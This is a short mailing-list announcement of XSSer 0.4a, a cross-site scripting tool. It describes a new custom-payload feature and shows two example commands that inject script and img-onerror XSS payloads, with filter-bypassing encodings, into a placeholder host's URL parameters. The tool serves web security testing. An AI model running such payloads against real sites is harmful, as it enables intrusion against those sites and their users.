[Xsser-users] xsser0.4a launched
XSSer: Cross Site Scripter
Status: Beta
Brought to you by:
lordepsylon
From: psy <ro...@lo...> - 2010-03-22 07:19:19
|
+added some documentation +added "inject your own payload" Very usefull payloading. You can inject your own payloads applying all the different -bypassers- of XSSer. Remember this. You always need to input XSS in the payload for create de ofuscation hashing. Examples: 1) simple: python XSSer.py -u "http://host.com" --payload "<script>XSS</script>" 2) advance: Injection from url, with postdata parameters, using your own payload, mode verbose and with encoding mutations python XSSer.py -u "http://host.com" -p "?a[]=" --payload '"><img src=x onerror=alert(XSS);>' --verbose --Cem "Hex,Str,Str,Une" Of course, now you can already be unstoppable. ;) |